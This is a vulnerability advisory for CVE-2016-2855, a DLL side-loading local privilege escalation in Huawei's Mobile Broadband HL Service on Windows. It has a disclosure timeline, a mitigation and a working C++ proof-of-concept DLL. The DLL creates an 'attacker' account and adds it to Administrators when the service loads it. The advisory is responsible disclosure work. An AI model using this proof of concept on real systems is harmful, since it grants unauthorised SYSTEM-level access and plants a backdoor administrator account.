Vulmon
Huawei Mobile Broadband HL Service Local Privilege Escalation
Metadata
===================================================
Release Date: 12-05-2016
Author: Florian Bogner @ Kapsch BusinessCom AG (https://www.kapsch.net/kbc)
Affected versions: up to the current 22.001.25.00.03 on x86 and x64
Tested on: Windows 7 32 bit and 64 bit
CVE : CVE-2016-2855
URL: https://bogner.sh/2016/05/cve-2016-2855-huawei-mobile-broadband-hl-service-local-privilege-escalation/
Video: https://youtu.be/MwtjE2PmEJU
Vulnerability Status: Fixed
Abstract
===================================================
The Windows service "Mobile Broadband HL Service" as installed by many? Huawei 3G/LTE modems is vulnerable to a DLL side loading attack allowing normal unprivileged users to gain full SYSTEM access.
Disclosure Timeline
===================================================
6.3.2016: Issue privately reported to Huawei
6.3.2016: CVE number requested
7.3.2016: MITRE assigned CVE-2016-2855
14.3.2016: Huawei verified the issue and is working on a fix
9.5.2016: Huawei informed me that the issue has been fixed in their latest release. However it is up to the carriers to push the fix to the devices.
Technical Details
===================================================
The service executable for the "Mobile Broadband HL Service" service is located in "C:\ProgramData\MobileBrServ". As the file permissions of this folder allow normal users to add files a malicious local attacker can drop a DLL named VERSION.dll into this folder. During the next boot this DLL is loaded and executed as part of the service launch. This causes a Local Privilege Escalation as this service is run as LOCAL SYSTEM.
Proof of Concept
===================================================
#include <process.h>
/*
To compile 32bit dll:
cl.exe /D_USRDLL /D_WINDLL version.cpp /link /DLL /OUT:version.dll
Put into C:\ProgramData\MobileBrServ and reboot your system -> a new user will be added
*/
/* export all required functions - use Dependency Walker to check what is needed */
extern "C"
{
__declspec(dllexport) int GetFileVersionInfoA();
__declspec(dllexport) int GetFileVersionInfoSizeA();
__declspec(dllexport) int VerQueryValueA();
}
/*
Implement DLLMain with common datatypes so we don't have to include windows.h.
Otherwise this would cause several compile errors because of the already known but reexported functions.
*/
int DllMain(void* hinst, unsigned long* reason, void* reserved) {
system("cmd /c \"echo>%tmp%\\dll_loaded\""); // cmd /c "echo>%tmp%\dll_loaded"
system("net user attacker Batman42 /add");
system("net localgroup Administrators attacker /add");
return 0;
}
/* Implement stubs of our exports */
int GetFileVersionInfoA() {
return 0;
}
int GetFileVersionInfoSizeA() {
return 0;
}
int VerQueryValueA() {
return 0;
}
Suggested Solution
===================================================
The correct solution to prevent this attack is so change the filesystem ACLs so that normal users are prohibited from creating files and directories within the C:\ProgramData\MobileBrServ folder.
Workaround
===================================================
Until Huawei pushes a fix the filesystem ACLs should be updated manually to prevent normal users to write anything into the service directory (C:\ProgramData\MobileBrServ). This can be automated using icacls.exe.
<p>